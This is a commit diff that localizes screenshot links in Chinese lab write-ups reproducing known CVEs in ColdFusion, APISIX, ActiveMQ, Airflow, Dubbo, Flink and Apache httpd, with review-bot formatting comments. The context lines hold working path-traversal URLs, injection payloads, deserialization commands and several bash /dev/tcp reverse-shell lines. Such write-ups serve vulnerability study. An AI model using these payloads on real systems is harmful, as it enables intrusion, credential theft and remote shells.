Commit

Localize images
Threekiii committed Dec 5, 2022
1 parent aba6db6 commit aca05e9
Showing 724 changed files with 548 additions and 548 deletions.
6 changes: 3 additions & 3 deletions Adobe ColdFusion 反序列化漏洞 CVE-2017-3066.md
Original file line number Diff line number Diff line change
@@ -56,12 +56,12 @@ Content-Length: 2853

------

![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202212052978.png)
![](./images/202202212052978.png)

进入容器中,发现`/tmp/success`已成功创建:

![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202212053950.png)
![](./images/202202212053950.png)

将POC改成[反弹命令](https://www.bugku.net/runtime-exec-payloads/),成功拿到shell:

![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202212053074.png)
![](./images/202202212053074.png)
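Review bot: the three rewritten image lines in this hunk keep the empty alt text of `![](./images/202202212052978.png)`; since the lines are being touched anyway, give each screenshot a one-phrase description (what the request, the container listing or the shell shows) so the Markdown stays readable without the image. Note also that the hunk records only the path change, not the PNG files themselves; confirm `images/202202212052978.png`, `images/202202212053950.png` and `images/202202212053074.png` are committed, otherwise these links 404 after the commit.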
4 changes: 2 additions & 2 deletions Adobe ColdFusion 文件读取漏洞 CVE-2010-2861.md
@@ -20,11 +20,11 @@ docker-compose up -d

直接访问`http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en`,即可读取文件`/etc/passwd`

![image-20220221201331662](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202212013778.png)
![image-20220221201331662](./images/202202212013778.png)

读取后台管理员密码`http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en`

![image-20220221201418990](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202212014074.png)
![image-20220221201418990](./images/202202212014074.png)



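Review bot: `./images/...` is resolved relative to the Markdown file, so the rewritten links only work while `Adobe ColdFusion 文件读取漏洞 CVE-2010-2861.md` and the `images/` directory stay in the same directory (both sit at the repository root here). If the writeups are later grouped into per-product subfolders, every one of these links will need rewriting again; a short note on that layout constraint in the README would save the next contributor the surprise.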
@@ -19,13 +19,13 @@ docker-compose up -d

然后访问`http://your-ip:9000/`即可看到Apache APISIX Dashboard的登录页面。

![image-20221011092319611](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202210110923738.png)
![image-20221011092319611](./images/202210110923738.png)

## 漏洞复现

利用`/apisix/admin/migrate/export``/apisix/admin/migrate/import`两个Apache APISIX Dashboard提供的未授权API,我们可以简单地导入一个恶意配置文件,其中包含我们构造的LUA脚本:

![image-20221011092714922](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202210110927989.png)
![image-20221011092714922](./images/202210110927989.png)

注意的是,这个配置文件的最后4个字符是当前文件的CRC校验码,所以最好通过自动化工具来生成和发送这个利用数据包,比如[这个POC](https://github.com/wuppp/cve-2021-45232-exp)

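Review bot: not introduced by this change, but visible in the context of this hunk: the two inline code spans `/apisix/admin/migrate/export` and `/apisix/admin/migrate/import` are written back to back with no character between them, which most Markdown renderers merge into one garbled span. Insert a separator such as `和` or `/` between the two spans while this file is being edited.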
@@ -127,7 +127,7 @@ if __name__ == "__main__":
print("attack error")
```

![image-20221011105801642](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202210111058704.png)
![image-20221011105801642](./images/202210111058704.png)

添加完恶意路由后,你需要访问Apache APISIX中对应的路径来触发前面添加的脚本。值得注意的是,Apache APISIX和Apache APISIX Dashboard是两个不同的服务,Apache APISIX Dashboard只是一个管理页面,而添加的路由是位于Apache APISIX中,所以需要找到Apache APISIX监听的端口或域名。

@@ -145,15 +145,15 @@ CMD: id
Cache-Control: max-age=0
```

![image-20221011105909716](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202210111059770.png)
![image-20221011105909716](./images/202210111059770.png)

也可以通过之前的POC实现命令执行:

```
curl http://your-ip:9080/LQsRF0 -H "cmd: id"
```

![image-20221011105809504](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202210111058564.png)
![image-20221011105809504](./images/202210111058564.png)

可见,我们在Header中添加的`CMD`头中的命令已被执行。

4 changes: 2 additions & 2 deletions Apache APISIX 默认密钥漏洞 CVE-2020-13945.md
@@ -48,13 +48,13 @@ Content-Length: 406
}
```

![image-20220221205854745](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202212058881.png)
![image-20220221205854745](./images/202202212058881.png)

然后,我们访问刚才添加的router,就可以通过cmd参数执行任意命令:

```
http://your-ip:9080/attack?cmd=id
```

![image-20220221205939127](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202212059179.png)
![image-20220221205939127](./images/202202212059179.png)

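Review bot: the alt text `image-20220221205854745` and `image-20220221205939127` in the rewritten lines is the Typora auto-generated filename and tells a reader nothing; as these lines are rewritten anyway, replace it with what the screenshot shows (the Admin API response, the output of `id` from the added route) or drop it in favour of a caption line. Documentation point only; the path change itself is fine.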
12 changes: 6 additions & 6 deletions Apache ActiveMQ 任意文件写入漏洞 CVE-2016-3088.md
@@ -52,7 +52,7 @@ docker-compose up -d

默认的ActiveMQ账号密码均为`admin`,首先访问`http://your-ip:8161/admin/test/systemProperties.jsp`,查看ActiveMQ的绝对路径:

![image-20220221144006543](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211440648.png)
![image-20220221144006543](./images/202202211440648.png)

然后上传webshell:

@@ -81,7 +81,7 @@ Content-Length: 374

移动到web目录下的api文件夹(`/opt/activemq/webapps/api/s.jsp`)中。如果Burpsuite发包不成功,使用Firefox进行修改后发送。

![image-20220221161155286](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211611379.png)
![image-20220221161155286](./images/202202211611379.png)

```
MOVE /fileserver/1.txt HTTP/1.1
@@ -95,13 +95,13 @@ Connection: close

shell.jsp已经上传成功:

![image-20220221153448172](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211534227.png)
![image-20220221153448172](./images/202202211534227.png)



通过webshell执行命令

![image-20220221154607001](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211546071.png)
![image-20220221154607001](./images/202202211546071.png)

### crontab反弹shell

@@ -132,11 +132,11 @@ Connection: close
Content-Length: 0
```

![image-20220221161242402](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211612498.png)
![image-20220221161242402](./images/202202211612498.png)

如果上述两个请求都返回204了,说明写入成功。等待反弹shell:

![image-20220221161312608](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211613664.png)
![image-20220221161312608](./images/202202211613664.png)

这个方法需要ActiveMQ是root运行,否则也不能写入cron文件。

18 changes: 9 additions & 9 deletions Apache ActiveMQ 反序列化漏洞 CVE-2015-5254.md
@@ -51,11 +51,11 @@ sudo update-alternatives --install /usr/bin/java java /usr/lib/jvm/java-8-openjd
sudo update-alternatives --config java
```

![image-20220221132209838](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211324903.png)
![image-20220221132209838](./images/202202211324903.png)

再次查看java版本,切换成功

![image-20220221132246597](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211324904.png)
![image-20220221132246597](./images/202202211324904.png)

## 漏洞复现

@@ -78,19 +78,19 @@ mkdir external
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/awesome_poc" -Yp ROME 192.168.174.128 61616
```

![image-20220221133654012](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211345369.png)
![image-20220221133654012](./images/202202211345369.png)

访问 http://192.168.174.128:8161/admin/browse.jsp?JMSDestination=event 可以看到多了一条消息队列,ID为kali-38087-1645421794512-1:1:1:1:1

默认账号密码:admin/admin

![image-20220221133733242](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211345370.png)
![image-20220221133733242](./images/202202211345370.png)

点击这个信息触发文件创建,成功执行命令 touch /tmp/awesome_poc

![image-20220221133952983](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211345371.png)
![image-20220221133952983](./images/202202211345371.png)

![2](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211324906.png)也可以创建一个反弹shell的payload
![2](./images/202202211324906.png)也可以创建一个反弹shell的payload

```shell
bash -i >& /dev/tcp/192.168.174.128/9999 0>&1 (base64编码)
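Review bot: the rewritten line `![2](./images/202202211324906.png)也可以创建一个反弹shell的payload` keeps the image and the sentence on one line, so the text renders glued to the image as a pseudo-caption, and the alt text `2` is meaningless. Split it into the image on its own line, a blank line, then the sentence, matching how every other screenshot in this file is laid out.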
@@ -102,13 +102,13 @@ bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3NC4xMjgvOTk5OSAwPiYx}|{bas
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3NC4xMjgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}" -Yp ROME 192.168.174.128 61616
```

![image-20220221134243490](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211345372.png)
![image-20220221134243490](./images/202202211345372.png)

查看消息队列,ID为kali-38435-1645422155171-1:1:1:1:1

![image-20220221134313545](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211345373.png)
![image-20220221134313545](./images/202202211345373.png)

监听9999端口,点击消息队列会触发命令执行,反弹Shell

![image-20220221134508900](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211345374.png)
![image-20220221134508900](./images/202202211345374.png)

@@ -42,13 +42,13 @@ docker-compose logs airflow-worker

可以看到如下信息:

![image-20220329100933012](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202204251947997.png)
![image-20220329100933012](./images/202204251947997.png)

```
docker-compose exec airflow-worker ls -l /tmp
```

可以看到成功创建了文件`airflow_celery_success`

![image-20220329101045692](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202204251947998.png)
![image-20220329101045692](./images/202204251947998.png)

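Review bot: this file's images come from the `typora-notes-1308934770` bucket while other files in the commit come from `typora-1308934770`, yet both are flattened into the single `./images/` directory keyed only by the timestamp-style basename (here `202204251947997.png`, `202204251947998.png`). Before merging, check that no basename occurs in both buckets; if one does, one screenshot silently overwrites the other and the wrong image is shown in one writeup.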
10 changes: 5 additions & 5 deletions Apache Airflow 示例DAG中的命令注入 CVE-2020-11978.md
@@ -31,15 +31,15 @@ docker-compose up -d

访问`http://your-ip:8080/admin/airflow/login`进入airflow管理端,将`example_trigger_target_dag`前面的Off改为On:

![image-20220329111338269](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202204251948096.png)
![image-20220329111338269](./images/202204251948096.png)

再点击执行按钮,在Configuration JSON中输入:`{"message":"'\";touch /tmp/airflow_dag_success;#"}`,再点`Trigger`执行dag:

![image-20220329111358392](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202204251948097.png)
![image-20220329111358392](./images/202204251948097.png)

等几秒可以看到执行成功:

![image-20220329111445804](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202204251948098.png)
![image-20220329111445804](./images/202204251948098.png)

到CeleryWorker容器中进行查看:

@@ -49,7 +49,7 @@ docker-compose exec airflow-worker ls -l /tmp

可以看到`touch /tmp/airflow_dag_success`成功被执行:

![image-20220329111605593](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202204251948099.png)
![image-20220329111605593](./images/202204251948099.png)

### 反弹shell

@@ -59,5 +59,5 @@ docker-compose exec airflow-worker ls -l /tmp
{"message":"'\";bash -i >& /dev/tcp/your-vps-ip/9999 0>&1;#"}
```

![image-20220329113423239](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202204251948100.png)
![image-20220329113423239](./images/202204251948100.png)

@@ -33,7 +33,7 @@ docker-compose up -d
curl -v http://localhost:8080/admin/airflow/login
```

![image-20220329105609442](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202204251948002.png)
![image-20220329105609442](./images/202204251948002.png)

然后,使用[flask-unsign](https://github.com/Paradoxis/Flask-Unsign)这个工具来爆破签名时使用的`SECRET_KEY`

@@ -45,15 +45,15 @@ pip install flask-unsign[wordlist]
flask-unsign -u -c [session from Cookie]
```

![image-20220329105921359](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202204251948003.png)
![image-20220329105921359](./images/202204251948003.png)

Bingo,成功爆破出Key是`temporary_key`。使用这个key生成一个新的session,其中伪造`user_id`为1:

```
flask-unsign -s --secret temporary_key -c "{'user_id': '1', '_fresh': False, '_permanent': True}"
```

![image-20220329110052524](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202204251948004.png)
![image-20220329110052524](./images/202204251948004.png)

新生成的session为:

@@ -63,7 +63,7 @@ eyJfZnJlc2giOmZhbHNlLCJfcGVybWFuZW50Ijp0cnVlLCJ1c2VyX2lkIjoiMSJ9.YkJ2WQ.sUbyyQy7

在浏览器中使用这个新生成的session,可见已成功登录:

![image-20220329110946880](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202204251948005.png)
![image-20220329110946880](./images/202204251948005.png)

可以使用Chrome插件[EditThisCookie](https://chrome.google.com/webstore/detail/editthiscookie/fngmhnnpilhplaeedifhccceomclgfbg/related?hl=zh)对Cookie进行修改。

8 changes: 4 additions & 4 deletions Apache Dubbo Java反序列化漏洞 CVE-2019-17564.md
@@ -51,7 +51,7 @@ $ ./zkCli -server target-ip:2181

连接后进入一个交互式控制台,使用`ls`即可列出其中所有节点,包括Dubbo相关的配置:

![image-20220222214720363](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202222147467.png)
![image-20220222214720363](./images/202202222147467.png)

获取到RPC接口名为`org.vulhub.api.CalcService`。直接用ysoserial生成CommonsCollections6的Payload作为POST Body发送到`http://your-ip:8080/org.vulhub.api.CalcService`即可触发反序列化漏洞:

@@ -61,11 +61,11 @@ $ java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections6 "touch /tmp/awe
$ curl -XPOST --data-binary @1.poc http://192.168.174.128:8080/org.vulhub.api.CalcService
```

![image-20220222220814317](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202222208473.png)
![image-20220222220814317](./images/202202222208473.png)

进入docker,命令`touch /tmp/awesome_poc`执行成功:

![image-20220222220908304](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202222209355.png)
![image-20220222220908304](./images/202202222209355.png)

反弹shell:

@@ -81,4 +81,4 @@ $ java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections6 "bash -c {echo,
$ curl -XPOST --data-binary @shell.poc http://192.168.174.128:8080/org.vulhub.api.CalcService
```

![image-20220222221020948](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202222210040.png)
![image-20220222221020948](./images/202202222210040.png)
4 changes: 2 additions & 2 deletions Apache Flink 小于1.9.1远程代码执行 CVE-2020-17518.md
@@ -59,9 +59,9 @@ success
------WebKitFormBoundaryoZ8meKnrrso89R6Y--
```

![image-20220223163924462](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202231639569.png)
![image-20220223163924462](./images/202202231639569.png)

查看docker,`/tmp/awesome_poc`成功创建。

![image-20220223164054096](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202231640168.png)
![image-20220223164054096](./images/202202231640168.png)

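Review bot: replacing the `typora-1308934770.cos.ap-beijing.myqcloud.com` URLs with in-repo paths is the right direction: rendering no longer depends on an object-storage bucket outside the repository's control (whose contents could change or disappear independently of the text), and readers' browsers stop issuing requests to that host. With 724 files touched, a final `grep -rn myqcloud.com` over the tree is worth running before merging to confirm no remote reference was missed, including any non-Markdown files.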
6 changes: 3 additions & 3 deletions Apache Flink 目录遍历漏洞 CVE-2020-17519.md
@@ -37,7 +37,7 @@ docker-compose up -d

Apache Flink 启动后,访问`http://your-ip:8081`查看主页。

![image-20220223182227651](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202231822762.png)
![image-20220223182227651](./images/202202231822762.png)

## 漏洞复现

@@ -47,7 +47,7 @@ Apache Flink 启动后,访问`http://your-ip:8081`查看主页。
http://xxx.xxx.xxx.xxx/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
```

![image-20220223182245983](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202231822055.png)
![image-20220223182245983](./images/202202231822055.png)

## 漏洞POC

@@ -118,5 +118,5 @@ if __name__ == '__main__':
POC_2(target_url, file_name)
```

![image-20220211111729412](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202111117492.png)
![image-20220211111729412](./images/202202111117492.png)

@@ -27,7 +27,7 @@ docker-compose up -d

访问http://192.168.174.128:8080/

![image-20220221182309270](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211823401.png)
![image-20220221182309270](./images/202202211823401.png)



@@ -45,11 +45,11 @@ Connection: close

数据包Response为302跳转

![image-20220221182519441](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211825565.png)
![image-20220221182519441](./images/202202211825565.png)

浏览器显示跳转到http://www.baidu.com/页面

![image-20220221182434435](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211824537.png)
![image-20220221182434435](./images/202202211824537.png)



@@ -39,15 +39,15 @@ curl -v --path-as-is http://your-ip:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/pas
可见,成功读取到`/etc/passwd`

![image-20220221183038882](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211830137.png)
![image-20220221183038882](./images/202202211830137.png)

在服务端开启了cgi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执行任意命令:

```
curl -v --data "echo;id" 'http://your-ip:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'
```

![image-20220221183147331](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211831505.png)
![image-20220221183147331](./images/202202211831505.png)

写入反弹shell

@@ -61,5 +61,5 @@ curl -v --data "echo;echo 'bash -i >& /dev/tcp/192.168.174.128/9999 0>&1'>> /tmp
curl -v --data "echo;bash /tmp/shell.sh" 'http://192.168.174.128:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'
```

![image-20220221184049972](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211840056.png)
![image-20220221184049972](./images/202202211840056.png)
